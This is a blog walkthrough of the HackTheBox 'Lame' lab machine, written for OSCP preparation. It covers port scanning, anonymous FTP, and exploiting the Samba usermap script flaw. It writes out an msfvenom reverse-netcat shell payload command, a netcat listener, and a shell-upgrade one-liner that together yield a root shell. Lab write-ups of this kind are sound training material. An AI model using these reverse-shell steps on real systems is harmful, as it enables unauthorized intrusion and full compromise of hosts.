Felix Meggison
4 min readFeb 7, 2021
HTB LAME (NO Metasploit) OSCP Prep

Hackthebox LAME Walkthrough (NO Metasploit) OSCP Prep.

Box Details

OS: Linux

Exploitable service: SMB

Difficulty: Easy

Estimated time: 45 minutes

1. Run NMAP scan to detect open ports

start with a full scan

This scan shows there are 4 ports open and shows the service running on the ports

port 21 FTP: vsftpd 2.3.4 (vulnerable) but a rabbit hole

port 22 SSH OpenSSH 4.7p1 (from experience SSH is hardly ever exploitable except through brute force or username enumeration)

Port 139: Netbios Samba always works together with port 445

Port 445: SMB: smbd 3.0.20 Debian (vulnerable)

2. run an Nmap scan to check for all ports

A look shows there’s an additional port 3632 with a distccd service running; tried enumerating it via netcat and web but yield no results so i assumed it was a rabbit hole.

The real enumeration

FTP

Firstly i tried checking if i could gain anonymous access via ftp

I successfully gained anonymous access via ftp, tried listing the contents of ftp directory but it seemed empty.

I tried uploading files via the PUT command but it failed.

But remember this is a vulnerable FTP version.

So i searched for public exploits on github (i’m a fan of using already modified scripts or tried scripts on github, though its a bad idea as you should get your exploit from trustworthy sources like exploitdb.com )

I tried some of the exploits here but they didnt work so i figured that a patch must have applied to the ftp application.

SMB Enumeration

Smb is a highly vulnerable services, and i had a feeling that the initial compromise of this box had to be the through this service. The version was already vulnerable to CVE-2007–2447 — Samba usermap script.

So i Knew this was the way into the box.

Tried enumerating via nmap nse but didnt get any results.

Tried Enumerating via Smbclient for shared shares but no results as well.

It was time to explore the SAMBA USERMAP SCRIPT EXPLOIT.

so i used an exploit by Macha97 which was simple python script that involved generating your shellcode with msfvenom and replacing with yours. https://github.com/macha97/exploit-smb-3.0.20

All you had to do as generate your shellcode with MSFvenom commad

#msfvenom -p cmd/unix/reverse_netcat LHOST=YOUR_IP LPORT=PORT -f python

replace your generated shellcode with that in the exploit. Depending on your python version you might have some issues but try using python3.

Set up your Netcat listner with your port. (Nc -lvnp PORT)

Run your exploit and your automatically get a root shell

you can upgrade your shell with python -c 'import pty; pty.spawn("/bin/bash")'

and enumerate to get your User.txt and root.txt.

Privillege escalation was not neccessary as the shell was already a root shell.

Thanks for Reading.

Felix Meggison

I'm a cyber security analyst who wants to be a Professional penetration tester. Currently working on getting my OSCP certification.